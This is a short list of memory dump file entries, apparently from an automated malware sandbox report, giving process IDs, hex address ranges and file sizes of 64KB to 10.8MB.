  • memory/1456-67-0x00007FF906850000-0x00007FF907311000-memory.dmp
    Filesize
    10.8MB
  • memory/4468-35-0x00007FF907FE0000-0x00007FF908AA1000-memory.dmp
    Filesize
    10.8MB
  • memory/4468-41-0x00007FF907FE0000-0x00007FF908AA1000-memory.dmp
    Filesize
    10.8MB
  • memory/4468-36-0x000001FD9EC30000-0x000001FD9EC40000-memory.dmp
    Filesize
    64KB
  • memory/4468-37-0x000001FD9EC30000-0x000001FD9EC40000-memory.dmp
    Filesize
    64KB
  • memory/4632-23-0x00007FF908330000-0x00007FF908DF1000-memory.dmp
    Filesize
    10.8MB
  • memory/4632-19-0x0000017079D50000-0x0000017079DA0000-memory.dmp
    Filesize
    320KB
  • memory/4632-18-0x0000017077890000-0x00000170778A0000-memory.dmp
    Filesize
    64KB
  • memory/4632-17-0x0000017077890000-0x00000170778A0000-memory.dmp
    Filesize
    64KB
  • memory/4632-16-0x00007FF908330000-0x00007FF908DF1000-memory.dmp
    Filesize
    10.8MB
  • memory/4632-6-0x000001705F340000-0x000001705F362000-memory.dmp
    Filesize
    136KB